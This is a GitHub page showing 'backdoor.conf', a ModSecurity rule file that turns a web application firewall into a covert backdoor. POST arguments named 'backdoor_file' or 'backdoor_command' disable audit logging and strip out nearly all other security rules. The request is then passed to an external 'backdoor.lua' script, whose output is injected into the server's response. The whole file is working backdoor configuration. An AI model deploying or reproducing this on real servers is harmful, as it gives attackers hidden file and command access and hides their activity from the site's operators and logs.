-
Notifications
You must be signed in to change notification settings - Fork 0
/
backdoor.conf
41 lines (38 loc) · 1.22 KB
/
backdoor.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# "THE BEER-WARE LICENSE" (Revision 42):
# <[email protected]> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. Jozef Sudolsky
SecAction \
"id:800,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:'tx.backdoor_file_argument_name=backdoor_file',\
setvar:'tx.backdoor_command_argument_name=backdoor_command'"
SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_file_argument_name}" \
"id:810,\
phase:2,\
pass,\
nolog,\
setvar:'tx.backdoor_request_type=file',\
ctl:auditEngine=Off,\
ctl:ruleRemoveById=1-799,\
ctl:ruleRemoveById=900-99999999"
SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_command_argument_name}" \
"id:820,\
phase:2,\
pass,\
nolog,\
setvar:'tx.backdoor_request_type=command',\
ctl:auditEngine=Off,\
ctl:ruleRemoveById=1-799,\
ctl:ruleRemoveById=900-99999999"
SecRule &TX:BACKDOOR_REQUEST_TYPE "@eq 1" \
"id:830,\
phase:4,\
pass,\
nolog,\
chain"
SecRule TX:BACKDOOR_REQUEST_TYPE "@inspectFile backdoor.lua" "chain"
SecRule STREAM_OUTPUT_BODY "@rsub s/.$/%{tx.backdoor_output}/"